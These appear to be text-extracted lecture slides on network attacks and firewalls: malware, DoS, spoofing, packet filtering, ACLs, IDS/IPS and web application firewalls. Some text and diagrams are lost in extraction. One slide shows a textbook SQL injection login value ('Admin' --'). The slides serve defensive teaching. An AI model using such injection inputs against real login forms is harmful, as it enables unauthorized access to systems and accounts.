Firewall

References
Computer Networking: A Top Down Approach ,Chapters 1 and 8, 4th edition. Jim Kurose, Keith Ross, Addison-Wesley, July 2007. ICCL-

Outline
Network Attacks Introduction of Firewall Firewall Products

Part 1 Network Attacks

Network Security (1/2)

Attacks on Internet infrastructure
Infecting/attacking hosts by malware: spyware, worms, unauthorized access (data stealing, user accounts) Denial of Service
Deny access to resources (servers, link bandwidth) Distributed Denial of Service (DDoS)

Network Security (2/2)

Internet not originally designed with (much) security in mind
Original vision: a group of mutually trusting users attached to a transparent network Internet protocol designers playing catch-up Security considerations in all layers!

System bug and hole Social engineering

6

Malware (1/2)
Spyware
Infection by downloading web page with spyware Records keystrokes, web sites visited, upload info to collection site

Virus
Infection by receiving object (e.g., e-mail attachment), actively executing Self-replicating: propagate itself to other hosts, users

Worm
Infection by passively receiving object that gets itself executed Self-replicating
7

Malware (2/2)
Trojan horse
BirdSpy: made in Taiwan Restore OS Used for DDoS

Denial of Service (DoS)

Attackers make resources (ex: servers, bandwidth) unavailable to legitimate traffic by overwhelming resource with bogus traffic.
Weak attack Bandwidth overload Connection overload
target

Ex: UDP packets or TCP requests

Some Types of DoS

Smurf attack
Ex: ping broadcasts (destination is 210.5.255.255)

Mail bomb
SPAM

Window system attack SYN flooding Buffer overflow ping of death

Create A TCP Connection

C lent i Server

SY N =1 Seq = 2000

Step 1: client host sends TCP SYN segment to server specifies initial seq # no data Step 2: server host receives SYN, replies with SYNACK segment
SY N =1,A C K =1 Seq = 4000 A C K # = 2001 Wi ndow si ze

A C K =1 Seq = 2001 A C K # = 4001 dat a

server allocates buffers specifies server initial seq. # Step 3: client receives SYN/ACK, replies with ACK segment, which may contain data
11

Distributed DoS (DDoS)

Attackers make resources (ex: servers, bandwidth) unavailable to legitimate traffic by overwhelming resource with bogus traffic.
1.

select target

2. break into hosts

around the network (see malware) 3. send packets toward target from compromised hosts

target

12

Packet Sniffing
Promiscuous network interface reads & records all packets passing by
Accept all broadcast media Wireshark (Ethereal) is a packet-sniffer! Sniff, modify, deletion your packets
Alice C

src:B dest:A

payload

Bob
1-13

IP Spoofing
Send packet with false source address Require end-point authentication
A C
src:B dest:A payload

14

Masquerade as you (1/2)

Record-and-playback
Sniff sensitive information (e.g., password), and use later.
C A
src:B dest:A user: B; password: foo

B
15

Masquerade as you (2/2)

Password holder is that user from system point of view Man-in-the-middle attack
later .. A
src:B dest:A user: B; password: foo

B
16

ow to Provide Security?
More throughout this course Cryptographic techniques: obvious uses and not so obvious uses Firewall

1-17

Part 2 Introduction of Firewall

18

Firewalls
To isolate organizations internal network from Internet, allowing some packets to pass, blocking others.

Internet
administered network firewall
19

public Internet

Comparison of Firewall & Router

firewall

router

IP
20

Goals of Firewalls
Prevent denial of service attacks
SYN flooding: attacker establishes many bogus TCP connections, no resources left for real connections

Prevent illegal modification/access of internal data.

E.g., attacker replaces Central Intelligence Agency s homepage with something else

Allow only authorized access to inside network (set of authenticated users/hosts)21

Types of Firewalls
Three types of firewalls:
Stateless packet filters Stateful packet filters Application gateways

22

Stateless Packet Filtering

Should arriving packet be allowed in? Departing packet let out?

Internet router firewall

Router filters packet-by-packet, decision to forward/drop packet based on

Source IP address, destination IP address TCP/UDP source and destination port numbers ICMP message type 23 TCP SYN and ACK bits

Stateless Packet Filtering Policy

Example 1: Block incoming and outgoing datagrams with protocol number=17 and with either source or destination port=23.
All incoming, outgoing UDP flows and telnet connections are blocked.

Example 2: Block inbound TCP segments with ACK=0.

Prevents external clients from making TCP connections with internal clients, but allows internal clients to connect to outside.

24

Policy & Firewall Setting

Policy
No outside Web access. No incoming TCP connections, except those for institutions public Web server only. Prevent Web-radios from eating up the available bandwidth. Prevent your network from being used for a smurf DoS attack. Prevent your network from being tracerouted

Firewall Setting
Drop all outgoing packets to any IP address, port 80 Drop all incoming TCP SYN packets to any IP except 130.207.244.203, port 80 Drop all incoming UDP packets except DNS and router broadcasts. Drop all ICMP packets going to a broadcast address (eg 130.207.255.255). Drop all outgoing ICMP TTL expired traffic
25

Access Control Lists

Table of rules, applied to all packets
action allow allow source address 222.22/16 outside of 222.22/16 222.22/16 outside of 222.22/16 all dest address outside of 222.22/16 222.22/16 protocol TCP TCP UDP UDP all source port > 1023 80 > 1023 53 all dest port 80 > 1023 53 > 1023 all flag bit any

ACK

allow allow deny

outside of 222.22/16 222.22/16 all

-----all 26

Question of Stateless Packet Filtering

Heavy handed tool Admits packets that make no sense, e.g., destination port = 80, ACK bit set, even though no TCP connection established.
action allow source address outside of 222.22/16 dest address 222.22/16 protocol source port 80 dest port > 1023 flag bit ACK

TCP

Source IP: 150.23.23.155 Destination IP: 222.22.0.2 Source port:80 Destination port:12543
27

Stateful Packet Filtering

r Track status of every TCP connection
m Track

connection setup (SYN), teardown (FIN): can determine whether incoming, outgoing packets makes sense m Timeout inactive connections at firewall: no longer admit packets m ACL augmented to indicate need to check connection state table before admitting packet
Source IP: 150.23.23.155 Destination IP: 222.22.0.2 Source port:80 Destination port:12543
28

Cisco Router Example

IP 211.21.160.12 network 168.95.35.0/24
168.95.35.0/22
e0

R2(config)#access-list 21 deny host 211.21.160.12 R2(config)#access-list 21 permit any R2(config)#interface serial 1 R2(config-if)#ip access-group 21 in 10.5.3.0/24 any= 0.0.0.0 255.255.255.255 deny ip any any host
s1

R2
S1 S0

R1
e0

wildcard mask 211.21.160.12/24

ACL for Stateful Packet Filtering

action allow allow source address 222.22/16 outside of 222.22/16 222.22/16 dest address outside of 222.22/16 222.22/16 proto TCP source port > 1023 dest port 80 flag bit any check connection

TCP

80

> 1023

ACK

allow allow

outside of 222.22/16 222.22/16

UDP

> 1023

53

---

outside of 222.22/16 all

UDP

53

> 1023

----

deny

all

all

all

all

all

8-30

Application Gateways
Filters packets on application data as well as on IP/TCP/UDP fields.
host-to-gateway telnet session
application gateway

gateway-to-remote host telnet session

router and filter

31

Application Gateways Example

Allow selected internal users to telnet outside.
1. Require all telnet users to telnet through gateway. 2. For authorized users, gateway sets up telnet connection to destination host. Gateway relays data between 2 connections 3. Router filter blocks all telnet connections not originating from gateway.
32

Comparison
Stateless/stateful filters
Operates on TCP/IP headers only No correlation check among sessions

Application gateways
Detect the application data Intrusion detection system (IDS)
Detect and alert if something wrong

Intrusion prevention system (IPS)

Detect, alert and filter out
33

Intrusion Detection Systems (IDS)

Deep packet inspection: look at packet contents
E.g., check character strings in packet against database of known virus, attack strings

Examine correlation among multiple packets

Port scanning Network mapping DoS attack
34

Multiple IDSs
Different types of checking at different locations
application gateway firewall

Internet internal network

IDS sensors

Web server FTP server

DNS server

demilitarized zone

35

Limitations of Firewalls (1/2)

IP spoofing: router cant know if data really comes from claimed source If multiple apps. need special treatment, each has own app. gateway. Client software must know how to contact gateway.
e.g., must set IP address of proxy in Web browser
36

Limitations of Firewalls (2/2)

Filters often use all or nothing policy for UDP. Tradeoff: degree of communication with outside world, level of security Many highly protected sites still suffer from attacks.

37

Part 3 Firewall Products

38

Firewalls
To isolate organizations internal network from Internet, allowing some packets to pass, blocking others.

Internet
administered network firewall
39

public Internet

Products
General firewall IDS, IPS Mail firewall Web Application Firewall (WAF)

40

Mail Firewall
Anti-virus Anti-spam

41

Web Site Attack

1

(A1)

Javascript

SQL

(A2) Web

4 Web 5 (A2)

42

Normal Connection

ID=A123456789 Passwd=1234

43

SQL Injection Attack

ID=Admin' -Passwd=1234

44

Cross Site Scripting (XSS)

Sever does not detect the page parameters. Sever does not detect the data upload (ex: YouTube). Web page is attached with bad script.
Ex: JavaScript VBScript

45

XSS Case 1:
XSS

cookie

Hackers Computer

cookies

XSS

46

XSS Case 2:
XSS

. Hackers Computer

XSS

domain

47

Hackers Server

Web Application Firewall (1/2)

Reverse proxy acts as an intermediary between a client browser and Web server.

48

Web Application Firewall (2/2)

Provides positive/negative dual-mode inspection

49

Summary
Firewall firewall log
50

IDS IPS ?

MIS